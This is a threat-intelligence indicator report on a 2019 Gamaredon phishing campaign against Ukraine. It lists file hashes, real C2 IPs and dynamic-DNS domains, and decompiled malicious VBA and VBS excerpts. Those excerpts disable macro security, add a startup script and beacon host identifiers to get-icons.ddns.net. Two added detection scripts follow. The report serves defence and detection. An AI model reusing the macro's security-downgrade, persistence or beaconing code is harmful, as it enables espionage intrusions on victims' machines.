VRad

#Gamaredon_181119

Nov 18th, 2019
#IOC #OptiData #VR #Gamaredon #xml.rels #macro #WSH

https://pastebin.com/Vhb4KF5L

FAQ:
https://radetskiy.wordpress.com/2019/11/19/ioc_gamaredon_181119/
https://www.malcrawler.com/russias-gamaredon-group-new-cyber-espionage-campaign-against-ukraine/
https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html
https://whotippedmycows.com/gamaredon-targets-ukraine-using-cve-2017-0199/
https://malpedia.caad.fkie.fraunhofer.de/actor/gamaredon_group

attack_vector
--------------
email attach .zip > .docx > xml.rels > GET .dot > macro > DROP vbs > WSH > 3rd stage ..
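The "docx > xml.rels > GET .dot" step of the chain above is a remote template relationship: the document's word/_rels/settings.xml.rels points the attached template at an external URL, and Word fetches it on open. The script below is an added triage example (not code from this paste or from the linked write-ups) that statically flags such a .docx. The sample package, the hyperlink inside it and the template URL are constructed for the check; the function and variable names are the example's own.

```python
"""
Added example, not code from the original paste or the linked write-ups:
statically flag a .docx whose settings.xml.rels pulls its attached template
from outside the package. The sample package and its URL are constructed.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = OFFICE_REL_NS + "/attachedTemplate"


def external_relationships(docx_bytes):
    """(part, type, target) for every relationship marked TargetMode="External".

    Ordinary hyperlinks are external too, so callers filter on the type.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("TargetMode", "Internal") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def remote_template_targets(docx_bytes):
    """URLs Word would fetch as the attached template when the file is opened."""
    return [
        target
        for part, rtype, target in external_relationships(docx_bytes)
        if part.endswith("settings.xml.rels") and rtype == ATTACHED_TEMPLATE
    ]


def build_sample_docx(template_url=None):
    """Constructed minimal package with only the parts this check touches.

    Every sample carries a normal external hyperlink in document.xml.rels;
    with template_url set, settings.xml.rels also points rId1 at that URL.
    """
    decl = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    rels_open = f'<Relationships xmlns="{PKG_REL_NS}">'
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    attached = '<w:attachedTemplate r:id="rId1"/>' if template_url else ""
    parts = {
        "[Content_Types].xml": decl + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/document.xml": decl + f'<w:document xmlns:w="{w_ns}"/>',
        "word/_rels/document.xml.rels": (
            decl + rels_open
            + f'<Relationship Id="rId1" Type="{OFFICE_REL_NS}/hyperlink" '
            + 'Target="http://example.com/" TargetMode="External"/></Relationships>'
        ),
        "word/settings.xml": (
            decl + f'<w:settings xmlns:w="{w_ns}" xmlns:r="{OFFICE_REL_NS}">'
            + attached + "</w:settings>"
        ),
    }
    if template_url is not None:
        parts["word/_rels/settings.xml.rels"] = (
            decl + rels_open
            + f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            + f'Target="{template_url}" TargetMode="External"/></Relationships>'
        )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed URL; not one of the hosts in this report.
    sample = build_sample_docx("http://template-host.example/apu.dot")
    print("remote templates:", remote_template_targets(sample))
```

The check reads only the package, so it is safe to run on a quarantined sample; the URL it returns is what Word would request, which is the value to block at the proxy and to search for in HTTP logs.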

email_headers
--------------
n/a

files
--------------
SHA-256 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
File name провадження.docx [Zip archive data, at least v2.0 to extract]
File size 49.8 kB

SHA-256 e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
File name apu[1].dot [Composite Document File V2 Document, Little Endian, Code page: 1251]
File size 47.1 kB

SHA-256 39c6884526e7b7f2ed6e47b630010508bb5957385eccf248c961cbd5bcb802c6
File name templates.vbs [Little-endian UTF-16 Unicode text, with CRLF, CR line terminators]
File size 8.9 kB

activity
**************
PL_SCR 141.8.195.60 win-apu.ddns.net [from settings.xml.rels]
C2 2.59.41.5 get-icons.ddns.net [from templates.vbs]

netwrk
--------------
[http]
141.8.195.60 win-apu.ddns.net GET /apu.dot HTTP/1.1 Mozilla/4.0
2.59.41.5 get-icons.ddns.net GET /Host_ID//autoindex.php HTTP/1.1 Mozilla/4.0

comp
--------------
wscript.exe 3684 TCP localhost 49419 vds-ce34203.timeweb.ru http

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
[another context]
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
[another context]
"C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs"

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 18.11.2019 16:17
templates.vbs
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\templates.vbs

drop
--------------
C:\tmp\Temporary Internet Files\Content.IE5\3YAVTBAP\apu[1].dot
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs

@ @ @
C2 (other domains, previous): from whotippedmycows.com and malcrawler.com
--------------
unhcr.ddns.net
rnbo-ua.ddns.net
network-crash.ddns.net
checkhurl.site
get-icons.ddns.net
bitvers.ddns.net
shell-sertificates.ddns.net
bitread.ddns.net
sv-menedgment.ddns.net
lookups.ddns.net
libresoft.ddns.net
document-write.ddns.net
suipost.ddns.net
document-listing.ddns.net
list-sert.ddns.net
military-ua.ddns.net
const-gov.ddns.net
my-certificates.ddns.net
checkhurl.fun
libre-boot.ddns.net
kristo-ua.ddns.net
templates.hopto.org
checkhurl.website
constructor-word.ddns.net
creative-office.ddns.net
kornet-ua.ddns.net
duktas-dde.ddns.net
message-office.ddns.net
micro-office.ddns.net
checkhurl.space
checkhurl.info
underlord.site
underlord.fun
underlord.space

@ @ @
metadata of 1st docx
--------------
File Size : 49 kB
File Modification Date/Time : 2019:11:18 12:19:29+02:00
File Access Date/Time : 2019:11:19 01:52:13+02:00
File Inode Change Date/Time : 2019:11:19 01:51:55+02:00
File Permissions : rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x5d2e7c58
Zip Compressed Size : 176
Zip Uncompressed Size : 247
Zip File Name : customXml/item1.xml
Template : UrbanResume.Dotx
Total Edit Time : 2 minutes
Pages : 1
Words : 111
Characters : 635
Application : Microsoft Office Word
Doc Security : None
Lines : 5
Paragraphs : 1
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : Reanimator Extreme Edition
Links Up To Date : No
Characters With Spaces : 745
Shared Doc : No
Hyperlinks Changed : No
App Version : 12.0000
Creator : ШУРИК
Last Modified By : ШУРИК
Revision Number : 3
Create Date : 2019:11:18 07:03:00Z
Modify Date : 2019:11:18 07:03:00Z

@ @ @
metadata of 2nd dot
--------------
File Size : 46 kB
File Modification Date/Time : 2019:11:06 14:39:21+02:00
File Access Date/Time : 2019:11:19 01:51:58+02:00
File Inode Change Date/Time : 2019:11:19 01:51:58+02:00
File Permissions : rw-rw-r--
File Type : DOT
File Type Extension : dot
MIME Type : application/msword
Title :
Subject :
Author : ШУРИК
Keywords :
Template : apu.dot
Last Modified By : ШУРИК
Revision Number : 17
Software : Microsoft Office Word
Total Edit Time : 1.0 minutes
Create Date : 2019:09:11 04:30:00
Modify Date : 2019:11:18 12:18:00
Pages : 1
Words : 2
Characters : 16
Security : None
Code Page : Windows Cyrillic
Company : Reanimator Extreme Edition
Lines : 1
Paragraphs : 1
Char Count With Spaces : 17
App Version : 12.0000
Scale Crop : No
Links Up To Date : No
Shared Doc : No
Hyperlinks Changed : No
Title Of Parts :
Heading Pairs : НазваМОе, 1
Comp Obj User Type Len : 39
Comp Obj User Type : Документ Microsoft Office Word 97-2003

@ @ @
drop-apu[1].dot [macro]
--------------
VBA MACRO ThisDocument.cls
in file: f2.dot - OLE stream: u'Macros/VBA/ThisDocument'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|CreateTextFile      |May create a text file                       |
|Suspicious|ADODB.Stream        |May create a text file                       |
|Suspicious|SaveToFile          |May create a text file                       |
|Suspicious|Environ             |May read system environment variables        |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|WScript.Shell       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Write               |May write to a file (if combined with Open)  |
|Suspicious|Open                |May open a file                              |
|Suspicious|Windows             |May enumerate application windows (if        |
|          |                    |combined with Shell.Application object)      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Xor                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|AccessVBOM          |May attempt to disable VBA macro security and|
|          |                    |Protected View                               |
|Suspicious|VBAWarnings         |May attempt to disable VBA macro security and|
|          |                    |Protected View                               |
|Suspicious|MSXML2.XMLHTTP      |May download files from the Internet         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |http://get-         |URL                                          |
|          |icons.ddns.net/     |                                             |
|IOC       |templates.vbs       |Executable file name                         |
+----------+--------------------+---------------------------------------------+

@ @ @ [f2.dot _ VBA]
Private Sub Document_Open()

Dim GoihGFG
GoihGFG = "Set WShell=CreateObject(""WScript.Shell"")"
Set rSwistz = CreateObject("WScript.Network")
Set MHHEFbR = CreateObject("Scripting.FileSystemObject")
jSsmRUH = MHHEFbR.Drives(Environ("SystemDrive")).SerialNumber
NlnQCJG = rSwistz.ComputerName
dqEBCgG$ = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _
"\Word\Security\"
CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "AccessVBOM", 1, "REG_DWORD"
CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "VBAWarnings", 1, "REG_DWORD"
uRDEJCn = Hex(jSsmRUH)
ZWyEwtz = "http://get-icons.ddns.net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.php"
fQCBSyj = AppPaths + "\Microsoft\Windows\Start Menu\Programs\Startup\""+" + "RandStrinh" + "+"".exe"
AREdQgT = AppPaths + "\""+ RandStrinh +" + """.txt"
LaIPBvl.Write "Dim GenRandom" + vbCrLf
LaIPBvl.Write "Const FoRandString = ""abcdefghijklmnopqrstuvwxyz0123456789""" + vbCrLf
LaIPBvl.Write "If f.Size < 11485 Then f.Delete" + vbCrLf
LaIPBvl.Write "Set HCJySbu = GetObject(""WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem"")" + LaIPBvl.Close
End Sub

@ @ @ [templates.vbs]
Function ibiexCm(URLA)
On Error Resume Next
Set DfnssAH = CreateObject("MSXML2.XMLHTTP")
Set PuchGYo = CreateObject( "Scripting.FileSystemObject" )
Function RandomString(ByVal palvados)
Dim GenRandom
Const FoRandString = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For i = 1 To palvados
GenRandom = GenRandom & Mid(FoRandString, Int(36 * Rnd + 1), 1)
Next
Set KHQCFif = CreateObject("Scripting.FileSystemObject")
Set jKFUmKe = CreateObject("ADODB.Stream")
jKFUmKe.SaveToFile "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt"
Set f = LHswYNG.GetFile("C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt")
If f.Size < 11485 Then f.Delete
errResult = Encode( "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt", "C:\Users\name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+RandStrinh+".exe", arrdqEBCgG )
WScript.Sleep 6400
WScript.Sleep 181040
save ibiexCm("http://get-icons.ddns.net/Host_ID//autoindex.php")
If PuchGYo.Fileexists("C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt") Then PuchGYo.DeleteFile "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt"
YDJncEX = 0
Dim HCJySbu, aCRoeaK, aCRoeaKSheck
Set HCJySbu = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Next
End If
End With
Loop
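The macro and script excerpts, together with the proc, persist and netwrk sections, give four behaviours a defender can turn into host and proxy detections: Word writing VBAWarnings and AccessVBOM = 1 under HKCU\...\Word\Security (the two RegWrite calls), WScript running a .vbs out of the per-user Startup folder, a script host spawned directly by Word, and the check-in URL the macro assembles as <ComputerName>_<Hex(volume serial)>//autoindex.php. The block below is an added example, not code from this paste or any referenced analysis; the event layout (plain dicts with kind/image/cmdline/key/value/url fields) is assumed rather than any particular EDR's schema, and the sample telemetry is constructed to mirror the sections above, reusing the report's own paths and the get-icons.ddns.net host.

```python
"""
Added example, not code from the original paste: a small detection pass over
constructed endpoint/proxy telemetry for the behaviours this report records.
The event layout is assumed, not any particular EDR's schema.
"""
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Per-user macro security values the macro sets to 1: VBAWarnings=1 enables
# all macros, AccessVBOM=1 trusts access to the VBA project object model.
OFFICE_SECURITY_RE = re.compile(
    r"\\software\\microsoft\\office\\[\d.]+\\(?:word|excel|powerpoint)"
    r"\\security\\(?:vbawarnings|accessvbom)$",
    re.I,
)
# A script inside the per-user Startup folder, the persistence path in the report.
STARTUP_SCRIPT_RE = re.compile(
    r"\\start menu\\programs\\startup\\[^\\]+\.(?:vbs|vbe|js|jse|wsf|hta)\b", re.I
)
# Beacon shape built by the macro: <ComputerName>_<Hex(serial)>//autoindex.php
BEACON_URL_RE = re.compile(r"/[^/]+_[0-9A-F]{1,8}//autoindex\.php$", re.I)


def _exe(path):
    """Lower-cased file name of a Windows path; works on any OS."""
    return ntpath.basename(path).lower()


def rule_office_macro_security_downgrade(ev):
    return (ev["kind"] == "registry"
            and _exe(ev["image"]) in OFFICE_APPS
            and OFFICE_SECURITY_RE.search(ev["key"]) is not None
            and ev["value"] == 1)


def rule_script_host_from_startup(ev):
    return (ev["kind"] == "process"
            and _exe(ev["image"]) in SCRIPT_HOSTS
            and STARTUP_SCRIPT_RE.search(ev["cmdline"]) is not None)


def rule_office_spawns_script_host(ev):
    return (ev["kind"] == "process"
            and _exe(ev["image"]) in SCRIPT_HOSTS
            and _exe(ev["parent_image"]) in OFFICE_APPS)


def rule_autoindex_beacon(ev):
    return (ev["kind"] == "network"
            and _exe(ev["image"]) in SCRIPT_HOSTS
            and BEACON_URL_RE.search(ev["url"]) is not None)


RULES = [
    ("office_macro_security_downgrade", rule_office_macro_security_downgrade),
    ("script_host_from_startup", rule_script_host_from_startup),
    ("office_spawns_script_host", rule_office_spawns_script_host),
    ("autoindex_beacon", rule_autoindex_beacon),
]


def run_rules(events):
    """Return (rule_name, event_id) for every rule/event match, in event order."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES if rule(ev)]


def _cmd(exe, arg):
    return f'"{exe}" "{arg}"'


WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
EXPLORER = r"C:\Windows\explorer.exe"
STARTUP = r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SECURITY_KEY = r"HKCU\Software\Microsoft\Office\12.0\Word\Security"

# Constructed sample telemetry modelled on the proc/persist/netwrk sections.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process", "image": WINWORD, "parent_image": EXPLORER,
     "cmdline": f'"{WINWORD}" /n /dde'},
    {"id": 2, "kind": "registry", "image": WINWORD,
     "key": SECURITY_KEY + r"\VBAWarnings", "value": 1},
    {"id": 3, "kind": "registry", "image": WINWORD,
     "key": SECURITY_KEY + r"\AccessVBOM", "value": 1},
    {"id": 4, "kind": "process", "image": WSCRIPT, "parent_image": EXPLORER,
     "cmdline": _cmd(WSCRIPT, STARTUP + r"\templates.vbs")},
    {"id": 5, "kind": "process", "image": WSCRIPT, "parent_image": WINWORD,
     "cmdline": _cmd(WSCRIPT, r"C:\Users\operator\AppData\Roaming\stage.vbs")},
    {"id": 6, "kind": "process", "image": WSCRIPT, "parent_image": EXPLORER,
     "cmdline": _cmd(WSCRIPT, r"C:\Scripts\inventory.vbs")},  # benign admin script
    {"id": 7, "kind": "registry", "image": WINWORD,
     "key": SECURITY_KEY + r"\VBAWarnings", "value": 2},  # "disable with notification"
    {"id": 8, "kind": "network", "image": WSCRIPT,
     "url": "http://get-icons.ddns.net/OPERATOR-PC_1A2B3C4D//autoindex.php"},
    {"id": 9, "kind": "network", "image": WSCRIPT,
     "url": "http://intranet.example/autoindex.php"},  # benign: no host id segment
]

if __name__ == "__main__":
    for name, event_id in run_rules(SAMPLE_EVENTS):
        print(f"{name}: event {event_id}")
```

The registry rule keys on the value being 1, because VBAWarnings = 2 is the normal "disable with notification" default and would otherwise flood the queue; the beacon rule matches the URL shape rather than the host, so it still fires when the group rotates to another of the ddns.net names listed above.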

# # #
https://www.virustotal.com/gui/ip-address/2.59.41.5/relations
https://www.virustotal.com/gui/ip-address/141.8.195.60/relations

VR